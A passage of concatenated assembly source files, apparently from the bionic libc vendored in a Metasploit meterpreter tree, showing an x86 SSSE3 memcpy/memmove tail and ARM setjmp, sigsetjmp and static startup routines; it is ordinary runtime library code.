L(fwd_write_21bytes):
movl -21(%eax), %ecx
movl %ecx, -21(%edx)
L(fwd_write_17bytes):
movl -17(%eax), %ecx
movl %ecx, -17(%edx)
L(fwd_write_13bytes):
movl -13(%eax), %ecx
movl %ecx, -13(%edx)
L(fwd_write_9bytes):
movl -9(%eax), %ecx
movl %ecx, -9(%edx)
movl -5(%eax), %ecx
movl %ecx, -5(%edx)
L(fwd_write_1bytes):
movzbl -1(%eax), %ecx
movb %cl, -1(%edx)
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
ALIGN (4)
L(fwd_write_46bytes):
movl -46(%eax), %ecx
movl %ecx, -46(%edx)
L(fwd_write_42bytes):
movl -42(%eax), %ecx
movl %ecx, -42(%edx)
L(fwd_write_38bytes):
movl -38(%eax), %ecx
movl %ecx, -38(%edx)
L(fwd_write_34bytes):
movl -34(%eax), %ecx
movl %ecx, -34(%edx)
L(fwd_write_30bytes):
movl -30(%eax), %ecx
movl %ecx, -30(%edx)
L(fwd_write_26bytes):
movl -26(%eax), %ecx
movl %ecx, -26(%edx)
L(fwd_write_22bytes):
movl -22(%eax), %ecx
movl %ecx, -22(%edx)
L(fwd_write_18bytes):
movl -18(%eax), %ecx
movl %ecx, -18(%edx)
L(fwd_write_14bytes):
movl -14(%eax), %ecx
movl %ecx, -14(%edx)
L(fwd_write_10bytes):
movl -10(%eax), %ecx
movl %ecx, -10(%edx)
L(fwd_write_6bytes):
movl -6(%eax), %ecx
movl %ecx, -6(%edx)
L(fwd_write_2bytes):
movzwl -2(%eax), %ecx
movw %cx, -2(%edx)
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
ALIGN (4)
L(fwd_write_47bytes):
movl -47(%eax), %ecx
movl %ecx, -47(%edx)
L(fwd_write_43bytes):
movl -43(%eax), %ecx
movl %ecx, -43(%edx)
L(fwd_write_39bytes):
movl -39(%eax), %ecx
movl %ecx, -39(%edx)
L(fwd_write_35bytes):
movl -35(%eax), %ecx
movl %ecx, -35(%edx)
L(fwd_write_31bytes):
movl -31(%eax), %ecx
movl %ecx, -31(%edx)
L(fwd_write_27bytes):
movl -27(%eax), %ecx
movl %ecx, -27(%edx)
L(fwd_write_23bytes):
movl -23(%eax), %ecx
movl %ecx, -23(%edx)
L(fwd_write_19bytes):
movl -19(%eax), %ecx
movl %ecx, -19(%edx)
L(fwd_write_15bytes):
movl -15(%eax), %ecx
movl %ecx, -15(%edx)
L(fwd_write_11bytes):
movl -11(%eax), %ecx
movl %ecx, -11(%edx)
L(fwd_write_7bytes):
movl -7(%eax), %ecx
movl %ecx, -7(%edx)
L(fwd_write_3bytes):
movzwl -3(%eax), %ecx
movzbl -1(%eax), %eax
movw %cx, -3(%edx)
movb %al, -1(%edx)
#ifndef USE_AS_BCOPY
# ifdef USE_AS_MEMPCPY
movl %edx, %eax
# else
movl DEST(%esp), %eax
# endif
#endif
RETURN
ALIGN (4)
L(large_page):
movdqu (%eax), %xmm1
lea 16(%eax), %eax
movdqu %xmm0, (%esi)
movntdq %xmm1, (%edx)
lea 16(%edx), %edx
POP (%esi)
lea -0x90(%ecx), %ecx
POP (%edi)
L(large_page_loop):
movdqu (%eax), %xmm0
movdqu 0x10(%eax), %xmm1
movdqu 0x20(%eax), %xmm2
movdqu 0x30(%eax), %xmm3
movdqu 0x40(%eax), %xmm4
movdqu 0x50(%eax), %xmm5
movdqu 0x60(%eax), %xmm6
movdqu 0x70(%eax), %xmm7
lea 0x80(%eax), %eax
sub $0x80, %ecx
movntdq %xmm0, (%edx)
movntdq %xmm1, 0x10(%edx)
movntdq %xmm2, 0x20(%edx)
movntdq %xmm3, 0x30(%edx)
movntdq %xmm4, 0x40(%edx)
movntdq %xmm5, 0x50(%edx)
movntdq %xmm6, 0x60(%edx)
movntdq %xmm7, 0x70(%edx)
lea 0x80(%edx), %edx
jae L(large_page_loop)
cmp $-0x40, %ecx
lea 0x80(%ecx), %ecx
jl L(large_page_less_64bytes)
movdqu (%eax), %xmm0
movdqu 0x10(%eax), %xmm1
movdqu 0x20(%eax), %xmm2
movdqu 0x30(%eax), %xmm3
lea 0x40(%eax), %eax
movntdq %xmm0, (%edx)
movntdq %xmm1, 0x10(%edx)
movntdq %xmm2, 0x20(%edx)
movntdq %xmm3, 0x30(%edx)
lea 0x40(%edx), %edx
sub $0x40, %ecx
L(large_page_less_64bytes):
cmp $32, %ecx
jb L(large_page_less_32bytes)
movdqu (%eax), %xmm0
movdqu 0x10(%eax), %xmm1
lea 0x20(%eax), %eax
movntdq %xmm0, (%edx)
movntdq %xmm1, 0x10(%edx)
lea 0x20(%edx), %edx
sub $0x20, %ecx
L(large_page_less_32bytes):
add %ecx, %edx
add %ecx, %eax
sfence
BRANCH_TO_JMPTBL_ENTRY (L(table_48bytes_fwd), %ecx, 4)
ALIGN (4)
L(bk_write_44bytes):
movl 40(%eax), %ecx
movl %ecx, 40(%edx)
L(bk_write_40bytes):
movl 36(%eax), %ecx
movl %ecx, 36(%edx)
L(bk_write_36bytes):
movl 32(%eax), %ecx
movl %ecx, 32(%edx)
L(bk_write_32bytes):
movl 28(%eax), %ecx
movl %ecx, 28(%edx)
L(bk_write_28bytes):
movl 24(%eax), %ecx
movl %ecx, 24(%edx)
L(bk_write_24bytes):
movl 20(%eax), %ecx
movl %ecx, 20(%edx)
L(bk_write_20bytes):
movl 16(%eax), %ecx
movl %ecx, 16(%edx)
L(bk_write_16bytes):
movl 12(%eax), %ecx
movl %ecx, 12(%edx)
L(bk_write_12bytes):
movl 8(%eax), %ecx
movl %ecx, 8(%edx)
L(bk_write_8bytes):
movl 4(%eax), %ecx
movl %ecx, 4(%edx)
L(bk_write_4bytes):
movl (%eax), %ecx
movl %ecx, (%edx)
L(bk_write_0bytes):
#ifndef USE_AS_BCOPY
movl DEST(%esp), %eax
# ifdef USE_AS_MEMPCPY
movl LEN(%esp), %ecx
add %ecx, %eax
# endif
#endif
RETURN
ALIGN (4)
L(bk_write_45bytes):
movl 41(%eax), %ecx
movl %ecx, 41(%edx)
L(bk_write_41bytes):
movl 37(%eax), %ecx
movl %ecx, 37(%edx)
L(bk_write_37bytes):
movl 33(%eax), %ecx
movl %ecx, 33(%edx)
L(bk_write_33bytes):
movl 29(%eax), %ecx
movl %ecx, 29(%edx)
L(bk_write_29bytes):
movl 25(%eax), %ecx
movl %ecx, 25(%edx)
L(bk_write_25bytes):
movl 21(%eax), %ecx
movl %ecx, 21(%edx)
L(bk_write_21bytes):
movl 17(%eax), %ecx
movl %ecx, 17(%edx)
L(bk_write_17bytes):
movl 13(%eax), %ecx
movl %ecx, 13(%edx)
L(bk_write_13bytes):
movl 9(%eax), %ecx
movl %ecx, 9(%edx)
L(bk_write_9bytes):
movl 5(%eax), %ecx
movl %ecx, 5(%edx)
L(bk_write_5bytes):
movl 1(%eax), %ecx
movl %ecx, 1(%edx)
L(bk_write_1bytes):
movzbl (%eax), %ecx
movb %cl, (%edx)
#ifndef USE_AS_BCOPY
movl DEST(%esp), %eax
# ifdef USE_AS_MEMPCPY
movl LEN(%esp), %ecx
add %ecx, %eax
# endif
#endif
RETURN
ALIGN (4)
L(bk_write_46bytes):
movl 42(%eax), %ecx
movl %ecx, 42(%edx)
L(bk_write_42bytes):
movl 38(%eax), %ecx
movl %ecx, 38(%edx)
L(bk_write_38bytes):
movl 34(%eax), %ecx
movl %ecx, 34(%edx)
L(bk_write_34bytes):
movl 30(%eax), %ecx
movl %ecx, 30(%edx)
L(bk_write_30bytes):
movl 26(%eax), %ecx
movl %ecx, 26(%edx)
L(bk_write_26bytes):
movl 22(%eax), %ecx
movl %ecx, 22(%edx)
L(bk_write_22bytes):
movl 18(%eax), %ecx
movl %ecx, 18(%edx)
L(bk_write_18bytes):
movl 14(%eax), %ecx
movl %ecx, 14(%edx)
L(bk_write_14bytes):
movl 10(%eax), %ecx
movl %ecx, 10(%edx)
L(bk_write_10bytes):
movl 6(%eax), %ecx
movl %ecx, 6(%edx)
L(bk_write_6bytes):
movl 2(%eax), %ecx
movl %ecx, 2(%edx)
L(bk_write_2bytes):
movzwl (%eax), %ecx
movw %cx, (%edx)
#ifndef USE_AS_BCOPY
movl DEST(%esp), %eax
# ifdef USE_AS_MEMPCPY
movl LEN(%esp), %ecx
add %ecx, %eax
# endif
#endif
RETURN
ALIGN (4)
L(bk_write_47bytes):
movl 43(%eax), %ecx
movl %ecx, 43(%edx)
L(bk_write_43bytes):
movl 39(%eax), %ecx
movl %ecx, 39(%edx)
L(bk_write_39bytes):
movl 35(%eax), %ecx
movl %ecx, 35(%edx)
L(bk_write_35bytes):
movl 31(%eax), %ecx
movl %ecx, 31(%edx)
L(bk_write_31bytes):
movl 27(%eax), %ecx
movl %ecx, 27(%edx)
L(bk_write_27bytes):
movl 23(%eax), %ecx
movl %ecx, 23(%edx)
L(bk_write_23bytes):
movl 19(%eax), %ecx
movl %ecx, 19(%edx)
L(bk_write_19bytes):
movl 15(%eax), %ecx
movl %ecx, 15(%edx)
L(bk_write_15bytes):
movl 11(%eax), %ecx
movl %ecx, 11(%edx)
L(bk_write_11bytes):
movl 7(%eax), %ecx
movl %ecx, 7(%edx)
L(bk_write_7bytes):
movl 3(%eax), %ecx
movl %ecx, 3(%edx)
L(bk_write_3bytes):
movzwl 1(%eax), %ecx
movw %cx, 1(%edx)
movzbl (%eax), %eax
movb %al, (%edx)
#ifndef USE_AS_BCOPY
movl DEST(%esp), %eax
# ifdef USE_AS_MEMPCPY
movl LEN(%esp), %ecx
add %ecx, %eax
# endif
#endif
RETURN_END
.pushsection .rodata.ssse3,"a",@progbits
ALIGN (2)
L(table_48bytes_fwd):
.int JMPTBL (L(fwd_write_0bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_1bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_2bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_3bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_4bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_5bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_6bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_7bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_8bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_9bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_10bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_11bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_12bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_13bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_14bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_15bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_16bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_17bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_18bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_19bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_20bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_21bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_22bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_23bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_24bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_25bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_26bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_27bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_28bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_29bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_30bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_31bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_32bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_33bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_34bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_35bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_36bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_37bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_38bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_39bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_40bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_41bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_42bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_43bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_44bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_45bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_46bytes), L(table_48bytes_fwd))
.int JMPTBL (L(fwd_write_47bytes), L(table_48bytes_fwd))
ALIGN (2)
L(shl_table):
.int JMPTBL (L(shl_0), L(shl_table))
.int JMPTBL (L(shl_1), L(shl_table))
.int JMPTBL (L(shl_2), L(shl_table))
.int JMPTBL (L(shl_3), L(shl_table))
.int JMPTBL (L(shl_4), L(shl_table))
.int JMPTBL (L(shl_5), L(shl_table))
.int JMPTBL (L(shl_6), L(shl_table))
.int JMPTBL (L(shl_7), L(shl_table))
.int JMPTBL (L(shl_8), L(shl_table))
.int JMPTBL (L(shl_9), L(shl_table))
.int JMPTBL (L(shl_10), L(shl_table))
.int JMPTBL (L(shl_11), L(shl_table))
.int JMPTBL (L(shl_12), L(shl_table))
.int JMPTBL (L(shl_13), L(shl_table))
.int JMPTBL (L(shl_14), L(shl_table))
.int JMPTBL (L(shl_15), L(shl_table))
ALIGN (2)
L(table_48_bytes_bwd):
.int JMPTBL (L(bk_write_0bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_1bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_2bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_3bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_4bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_5bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_6bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_7bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_8bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_9bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_10bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_11bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_12bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_13bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_14bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_15bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_16bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_17bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_18bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_19bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_20bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_21bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_22bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_23bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_24bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_25bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_26bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_27bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_28bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_29bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_30bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_31bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_32bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_33bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_34bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_35bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_36bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_37bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_38bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_39bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_40bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_41bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_42bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_43bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_44bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_45bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_46bytes), L(table_48_bytes_bwd))
.int JMPTBL (L(bk_write_47bytes), L(table_48_bytes_bwd))
.popsection
#ifdef USE_AS_MEMMOVE
ALIGN (4)
L(copy_backward):
PUSH (%esi)
movl %eax, %esi
lea (%ecx,%edx,1),%edx
lea (%ecx,%esi,1),%esi
testl $0x3, %edx
jnz L(bk_align)
L(bk_aligned_4):
cmp $64, %ecx
jae L(bk_write_more64bytes)
L(bk_write_64bytesless):
cmp $32, %ecx
jb L(bk_write_less32bytes)
L(bk_write_more32bytes):
/* Copy 32 bytes at a time. */
sub $32, %ecx
movl -4(%esi), %eax
movl %eax, -4(%edx)
movl -8(%esi), %eax
movl %eax, -8(%edx)
movl -12(%esi), %eax
movl %eax, -12(%edx)
movl -16(%esi), %eax
movl %eax, -16(%edx)
movl -20(%esi), %eax
movl %eax, -20(%edx)
movl -24(%esi), %eax
movl %eax, -24(%edx)
movl -28(%esi), %eax
movl %eax, -28(%edx)
movl -32(%esi), %eax
movl %eax, -32(%edx)
sub $32, %edx
sub $32, %esi
L(bk_write_less32bytes):
movl %esi, %eax
sub %ecx, %edx
sub %ecx, %eax
POP (%esi)
L(bk_write_less32bytes_2):
BRANCH_TO_JMPTBL_ENTRY (L(table_48_bytes_bwd), %ecx, 4)
ALIGN (4)
L(bk_align):
cmp $8, %ecx
jbe L(bk_write_less32bytes)
testl $1, %edx
/* We get here only if (EDX & 3 ) != 0 so if (EDX & 1) ==0,
then (EDX & 2) must be != 0. */
jz L(bk_got2)
sub $1, %esi
sub $1, %ecx
sub $1, %edx
movzbl (%esi), %eax
movb %al, (%edx)
testl $2, %edx
jz L(bk_aligned_4)
L(bk_got2):
sub $2, %esi
sub $2, %ecx
sub $2, %edx
movzwl (%esi), %eax
movw %ax, (%edx)
jmp L(bk_aligned_4)
ALIGN (4)
L(bk_write_more64bytes):
/* Check alignment of last byte. */
testl $15, %edx
jz L(bk_ssse3_cpy_pre)
/* EDX is aligned 4 bytes, but not 16 bytes. */
L(bk_ssse3_align):
sub $4, %esi
sub $4, %ecx
sub $4, %edx
movl (%esi), %eax
movl %eax, (%edx)
testl $15, %edx
jz L(bk_ssse3_cpy_pre)
sub $4, %esi
sub $4, %ecx
sub $4, %edx
movl (%esi), %eax
movl %eax, (%edx)
testl $15, %edx
jz L(bk_ssse3_cpy_pre)
sub $4, %esi
sub $4, %ecx
sub $4, %edx
movl (%esi), %eax
movl %eax, (%edx)
L(bk_ssse3_cpy_pre):
cmp $64, %ecx
jb L(bk_write_more32bytes)
L(bk_ssse3_cpy):
sub $64, %esi
sub $64, %ecx
sub $64, %edx
movdqu 0x30(%esi), %xmm3
movdqa %xmm3, 0x30(%edx)
movdqu 0x20(%esi), %xmm2
movdqa %xmm2, 0x20(%edx)
movdqu 0x10(%esi), %xmm1
movdqa %xmm1, 0x10(%edx)
movdqu (%esi), %xmm0
movdqa %xmm0, (%edx)
cmp $64, %ecx
jae L(bk_ssse3_cpy)
jmp L(bk_write_64bytesless)
#endif
END (MEMCPY)
|
OpenWireSec/metasploit | 3,680 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/setjmp.S | /* $OpenBSD: setjmp.S,v 1.2 2004/02/01 05:40:52 drahn Exp $ */
/* $NetBSD: setjmp.S,v 1.5 2003/04/05 23:08:51 bjh21 Exp $ */
/*
* Copyright (c) 1997 Mark Brinicombe
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by Mark Brinicombe
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- setjmp, longjmp
*
* longjmp(a,v)
* will generate a "return(v)" from the last call to
* setjmp(a)
* by restoring registers from the stack.
* The previous signal state is restored.
*/
ENTRY(setjmp)
/* Block all signals and retrieve the old signal mask */
stmfd sp!, {r0, r14}
mov r0, #0x00000000
bl PIC_SYM(_C_LABEL(sigblock), PLT)
mov r1, r0
ldmfd sp!, {r0, r14}
/* Store signal mask */
str r1, [r0, #(25 * 4)]
ldr r1, .Lsetjmp_magic
str r1, [r0], #4
#ifdef SOFTFLOAT
add r0, r0, #52
#else
/* Store fp registers */
sfm f4, 4, [r0], #48
/* Store fpsr */
rfs r1
str r1, [r0], #0x0004
#endif /*SOFTFLOAT*/
/* Store integer registers */
stmia r0, {r4-r14}
mov r0, #0x00000000
bx lr
.Lsetjmp_magic:
.word _JB_MAGIC_SETJMP
ENTRY(longjmp)
ldr r2, .Lsetjmp_magic
ldr r3, [r0]
teq r2, r3
bne botch
/* Fetch signal mask */
ldr r2, [r0, #(25 * 4)]
/* Set signal mask */
stmfd sp!, {r0, r1, r14}
sub sp, sp, #4 /* align the stack */
mov r0, r2
bl PIC_SYM(_C_LABEL(sigsetmask), PLT)
add sp, sp, #4 /* unalign the stack */
ldmfd sp!, {r0, r1, r14}
add r0, r0, #4
#ifdef SOFTFLOAT
add r0, r0, #52
#else
/* Restore fp registers */
lfm f4, 4, [r0], #48
/* Restore FPSR */
ldr r4, [r0], #0x0004
wfs r4
#endif /* SOFTFLOAT */
/* Restore integer registers */
ldmia r0, {r4-r14}
/* Validate sp and r14 */
teq sp, #0
teqne r14, #0
beq botch
/* Set return value */
mov r0, r1
teq r0, #0x00000000
moveq r0, #0x00000001
bx lr
#ifdef __ARM_26__
mov r15, r14
#else
mov r15, r14
#endif
/* validation failed, die die die. */
botch:
bl PIC_SYM(_C_LABEL(longjmperror), PLT)
bl PIC_SYM(_C_LABEL(abort), PLT)
b . - 8 /* Cannot get here */
|
OpenWireSec/metasploit | 2,438 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/sigsetjmp.S | /* $OpenBSD: sigsetjmp.S,v 1.2 2004/02/01 05:40:52 drahn Exp $ */
/* $NetBSD: sigsetjmp.S,v 1.3 2002/08/17 19:54:30 thorpej Exp $ */
/*
* Copyright (c) 1997 Mark Brinicombe
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* This product includes software developed by Mark Brinicombe
* 4. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
#include <machine/setjmp.h>
/*
* C library -- sigsetjmp, siglongjmp
*
* longjmp(a,v)
* will generate a "return(v)" from the last call to
* setjmp(a, m)
* by restoring registers from the stack.
* The previous signal state is restored.
*/
ENTRY(sigsetjmp)
teq r1, #0
beq PIC_SYM(_C_LABEL(_setjmp), PLT)
b PIC_SYM(_C_LABEL(setjmp), PLT)
.L_setjmp_magic:
.word _JB_MAGIC__SETJMP
ENTRY(siglongjmp)
ldr r2, .L_setjmp_magic
ldr r3, [r0]
teq r2, r3
beq PIC_SYM(_C_LABEL(_longjmp), PLT)
b PIC_SYM(_C_LABEL(longjmp), PLT)
|
OpenWireSec/metasploit | 2,643 | external/source/meterpreter/source/bionic/libc/arch-arm/bionic/crtbegin_static.S | /*
* Copyright (C) 2008 The Android Open Source Project
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
* OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
.text
.align 4
.type _start,#function
.globl _start
# this is the small startup code that is first run when
# any executable that is statically-linked with Bionic
# runs.
#
# it's purpose is to call __libc_init with appropriate
# arguments, which are:
#
# - the address of the raw data block setup by the Linux
# kernel ELF loader
#
# - address of an "onexit" function, not used on any
# platform supported by Bionic
#
# - address of the "main" function of the program. We
# can't hard-code it in the adr pseudo instruction
# so we use a tiny trampoline that will get relocated
# by the dynamic linker before this code runs
#
# - address of the constructor list
#
_start:
mov r0, sp
mov r1, #0
adr r2, 0f
adr r3, 1f
b __libc_init
0: b main
1: .long __PREINIT_ARRAY__
.long __INIT_ARRAY__
.long __FINI_ARRAY__
.long __CTOR_LIST__
.section .preinit_array, "aw"
.globl __PREINIT_ARRAY__
__PREINIT_ARRAY__:
.long -1
.section .init_array, "aw"
.globl __INIT_ARRAY__
__INIT_ARRAY__:
.long -1
.section .fini_array, "aw"
.globl __FINI_ARRAY__
__FINI_ARRAY__:
.long -1
.section .ctors, "aw"
.globl __CTOR_LIST__
__CTOR_LIST__:
.long -1
#include "__dso_handle.S"
|
